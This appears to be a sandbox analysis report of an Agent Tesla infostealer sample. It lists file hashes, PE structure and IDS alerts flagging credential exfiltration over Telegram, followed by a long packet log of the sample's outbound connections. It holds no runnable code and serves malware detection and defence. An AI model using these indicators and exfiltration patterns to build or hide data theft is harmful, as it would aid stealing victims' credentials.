SSDEEP:	24:z3d3+DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zNODBXZxo4ABV+SrUYE
MD5:	402278578416001C915480C7040F2964
SHA1:	B4833865ECE3609EC213509D4AB7D7A195C00753
SHA-256:	86E0747C9B54AA9AACB788589E70E19279DF13F1393795E689342AF3302912E1
SHA-512:	473600FBC051B22E9E7A6FBE1694ED736CF90DE5A8DF92AF1FA9A85DDD97379CFF0E8A5DF89937AE083BEBEFC81C407A907D0FB5ED9019BEDF6FB4703838321B
Malicious:	false
Preview:	Microsoft .NET Framework Assembly Registration Utility version 4.8.4084.0..for Microsoft .NET Framework version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.892712338413715
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	08(2)_00.exe
File size:	307'712 bytes
MD5:	4fdf9741c120f25e66ba4cf07067c5d5
SHA1:	7edfe85c45ead131f31f158c6c4ba2ef5f6291c8
SHA256:	3702d77895124b57140bce0482029875be25274a2c30ec6d8fac8bbdfcd92394
SHA512:	0a2194639ae4870cdc4cbfb74e3d7a5e7a5c24c22f35d1616acdcf0063d82e14d7b0c7b04427321b95d3dfa283970e0f4c90b7732d4cb1232461e06ab19d45b6
SSDEEP:	6144:tqEttR2Nor0fA34WY4bBdTvki2QMqoFZRGILs1UbEIIRA7C+iwH2:nhfY0BdTsQMhFfGIxEIIK99
TLSH:	01640279279BE3D3C5AC57F9A874922127BA3C26A216D24ECCC435D33E26B1505C0EA7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^d..............0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	084cd212f3c80c53

Static PE Info

General

Entrypoint:	0x44b5ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x645EDBEE [Sat May 13 00:38:06 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4b598	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4c000	0x170c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x495f4	0x49600	00541d5db02793eb492a8051a7bf9027	False	0.8851515917802385	data	7.926510501369591	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4c000	0x170c	0x1800	fa1b85983d4feb3d41cac6ef5ef6ee96	False	0.23323567708333334	data	4.013605999362949	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4e000	0xc	0x200	88e9d941cab68a908f7eb0f599240376	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4c130	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	0.1625234521575985
RT_GROUP_ICON	0x4d1d8	0x14	data	1.1
RT_VERSION	0x4d1ec	0x334	data	0.42560975609756097
RT_MANIFEST	0x4d520	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T09:17:25.387729+0200	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.8	49705	149.154.167.220	443	TCP
2024-10-03T09:17:25.387729+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49705	149.154.167.220	443	TCP
2024-10-03T09:17:26.603483+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49706	149.154.167.220	443	TCP
2024-10-03T09:19:04.209585+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49715	149.154.167.220	443	TCP
2024-10-03T09:19:19.509096+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49716	149.154.167.220	443	TCP
2024-10-03T09:19:22.401628+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49717	149.154.167.220	443	TCP
2024-10-03T09:19:26.207492+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49718	149.154.167.220	443	TCP
2024-10-03T09:19:31.259133+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49719	149.154.167.220	443	TCP
2024-10-03T09:19:37.555481+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49720	149.154.167.220	443	TCP
2024-10-03T09:19:39.334371+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49721	149.154.167.220	443	TCP
2024-10-03T09:20:25.017978+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49722	149.154.167.220	443	TCP
2024-10-03T09:20:34.838501+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49723	149.154.167.220	443	TCP
2024-10-03T09:20:36.342298+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49724	149.154.167.220	443	TCP
2024-10-03T09:20:48.244583+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49725	149.154.167.220	443	TCP
2024-10-03T09:20:54.389550+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49726	149.154.167.220	443	TCP
2024-10-03T09:21:15.789221+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49727	149.154.167.220	443	TCP
2024-10-03T09:21:27.976770+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.8	49728	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:17:22.446355104 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:22.446453094 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:22.446578979 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:22.501365900 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:22.501393080 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:22.961148977 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:22.961260080 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:22.969333887 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:22.969371080 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:22.969698906 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:23.024722099 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:23.089093924 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:23.131475925 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:23.199415922 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:23.199486971 CEST	443	49704	104.26.12.205	192.168.2.8
Oct 3, 2024 09:17:23.199556112 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:23.233419895 CEST	49704	443	192.168.2.8	104.26.12.205
Oct 3, 2024 09:17:24.296097040 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:24.296148062 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:24.296251059 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:24.301299095 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:24.301312923 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:24.919142962 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:24.919274092 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:24.923911095 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:24.923943043 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:24.924290895 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:24.925599098 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:24.971402884 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:25.214915991 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:25.215281010 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:25.215318918 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:25.387577057 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:25.387856007 CEST	443	49705	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:25.387914896 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:25.399267912 CEST	49705	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:25.513962984 CEST	49706	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:25.514024019 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:25.514192104 CEST	49706	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:25.514410973 CEST	49706	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:25.514434099 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:26.126224041 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:26.128210068 CEST	49706	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:26.128258944 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:26.425158024 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:26.428097010 CEST	49706	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:26.428188086 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:26.603549004 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:26.603634119 CEST	443	49706	149.154.167.220	192.168.2.8
Oct 3, 2024 09:17:26.603773117 CEST	49706	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:17:26.606208086 CEST	49706	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.182584047 CEST	49714	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.182641983 CEST	443	49714	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.182765007 CEST	49714	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.183209896 CEST	49714	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.183232069 CEST	443	49714	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.265714884 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.265758038 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.265873909 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.266324997 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.266336918 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.274353027 CEST	49714	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.319407940 CEST	443	49714	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.789721966 CEST	443	49714	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.789846897 CEST	443	49714	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.789961100 CEST	49714	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.789961100 CEST	49714	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.899038076 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.899249077 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.907561064 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.907571077 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.907963037 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:03.921163082 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:03.963416100 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:04.208748102 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:04.209220886 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:04.209255934 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:04.209342957 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:04.209376097 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:04.209464073 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:04.209512949 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:04.566358089 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:04.566450119 CEST	443	49715	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:04.566510916 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:04.567038059 CEST	49715	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:18.443284988 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:18.443337917 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:18.443420887 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:18.443922043 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:18.443936110 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.175813913 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.181505919 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:19.181535959 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.503880024 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.507932901 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:19.507971048 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.508611917 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:19.508639097 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.509032011 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:19.509052992 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.908684015 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.909615040 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:19.909710884 CEST	443	49716	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:19.910128117 CEST	49716	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:21.323883057 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:21.323935032 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:21.324393034 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:21.324393988 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:21.324430943 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.078963041 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.079102039 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:22.083575964 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:22.083589077 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.083890915 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.085830927 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:22.131405115 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.400495052 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.401037931 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:22.401072979 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.401201963 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:22.401212931 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.401297092 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:22.401340008 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.812555075 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.812860966 CEST	443	49717	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:22.813076973 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:22.813252926 CEST	49717	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:25.267580032 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:25.267625093 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:25.267750025 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:25.268553972 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:25.268570900 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:25.892158985 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:25.897190094 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:25.897214890 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:26.206681013 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:26.207184076 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:26.207211018 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:26.207283974 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:26.207304001 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:26.207387924 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:26.207422018 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:26.567755938 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:26.567862034 CEST	443	49718	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:26.567909956 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:26.568407059 CEST	49718	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:30.328608036 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:30.328685999 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:30.328779936 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:30.329206944 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:30.329243898 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:30.949330091 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:30.951242924 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:30.951314926 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:31.253305912 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:31.253770113 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:31.253843069 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:31.258630991 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:31.258668900 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:31.258758068 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:31.258789062 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:31.626178980 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:31.626594067 CEST	443	49719	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:31.626666069 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:31.627445936 CEST	49719	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:36.593553066 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:36.593606949 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:36.593888998 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:36.594209909 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:36.594228029 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.239677906 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.242068052 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:37.242088079 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.554274082 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.554774046 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:37.554812908 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.554929018 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:37.554949045 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.555408001 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:37.555421114 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.922513962 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.922832966 CEST	443	49720	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:37.923019886 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:37.928128004 CEST	49720	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:38.408874989 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:38.408930063 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:38.409885883 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:38.410326004 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:38.410341978 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.036947966 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.038922071 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:39.038949966 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.333023071 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.333662987 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:39.333765984 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.333906889 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:39.333956003 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.334266901 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:39.334290028 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.685935020 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.686345100 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 3, 2024 09:19:39.686553001 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:19:39.686826944 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:24.103315115 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:24.103369951 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:24.103565931 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:24.107624054 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:24.107642889 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:24.718228102 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:24.720602036 CEST	49722	443	192.168.2.8	149.154.167.220
